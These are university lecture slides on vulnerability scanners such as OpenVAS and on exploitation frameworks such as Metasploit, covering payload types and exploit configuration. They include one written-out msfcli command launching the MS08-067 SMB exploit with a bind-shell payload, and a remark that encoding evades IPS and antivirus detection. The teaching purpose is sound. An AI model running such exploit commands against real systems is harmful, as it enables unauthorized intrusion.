CIT 480: Securing Computer Systems Vulnerability Scanning and Exploitation Frameworks
Vulnerability Scanners Vulnerability scanners are automated tools that scan hosts and networks for potential vulnerabilities, including Configuration errors Known unpatched vulnerabilities
Vulnerability Databases
Advantages Vulnerability scanners can identify thousands of potential security issues. Automatically and quickly. On a regular basis, to ensure no systems have become vulnerable. Can identify problems missed by or misconfigured by administrators. Lets security know where problems exist. Essential part of defense in depth.
Drawbacks Results only as good as vulnerability database. Must keep vulnerability db up to date. Some reported vulnerabilities are false positives. Must check for existence of actual vulnerability. Configure scanner to ignore false +s in future scans. Human threats are better than scanner Can use zero day vulnerabilities not found in db. Can find misconfigurations or combinations of security problems that lead to vulnerabilities that scanner cannot find.
Vulnerability Scanners
OpenVAS Architecture
OpenVAS In-progress Scans
OpenVAS Vulnerability Report
Exploitation Frameworks Exploitation frameworks allow users to Choose and configure an exploit from a database of exploits. Launch exploits on specified targets to verify whether a vulnerability is present or not. Useful for Verifying vulnerability scanner results. Performing penetration tests. Convincing management that a problem exists.
Exploitation Frameworks
Metasploit Architecture
msfconsole Metasploit Interfaces Interactive command line interface. msfcli Non-interactive command line interface. msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp Armitage Interactive graphical interface.
Exploit Configuration 1. OS and Application Version Variants of exploit may need to be chosen. 2. Target selection IP address and port 3. Payload selection Select shellcode type, e.g. shell or desktop. 4. Encoding Encoding of exploit avoids IPS or AV detection.
Payloads Bind Shell Open a port on the exploited host offering a shell with no password required. Reverse Shell Target makes connection back to listening port on one of your servers, offering a shell. Remote Desktop Remote desktop using RDP, VNC, NX, or X. Meterpreter Advanced payload with post-exploitation modules, including key logging, sniffing, hash dumping, etc.
Vulnerability scanners Key Points Automatically scan network to find vulnerabilities based on vulnerability database. Results only as good as vulnerability database. Human attackers are better than scanners, so a clean scan doesn t indicate perfect security. Exploitation frameworks Verify vulnerability scanner results. Assist in penetration testing.
References 1. David Kennedy et. Al., Metasploit: The Penetration Tester s Guide, No Starch Press, 2011.
Released under CC BY-SA 3.0 This presentation is released under the Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) license You are free: to Share to copy and redistribute the material in any medium to Adapt to remix, build, and transform upon the material to use part or all of this presentation in your own classes Under the following conditions: Attribution You must attribute the work to James Walden, but cannot do so in a way that suggests that he endorses you or your use of these materials. Share Alike If you remix, transform, or build upon this material, you must distribute the resulting work under this or a similar open license. Details and full text of the license can be found at https://creativecommons.org/licenses/by-nc-sa/3.0/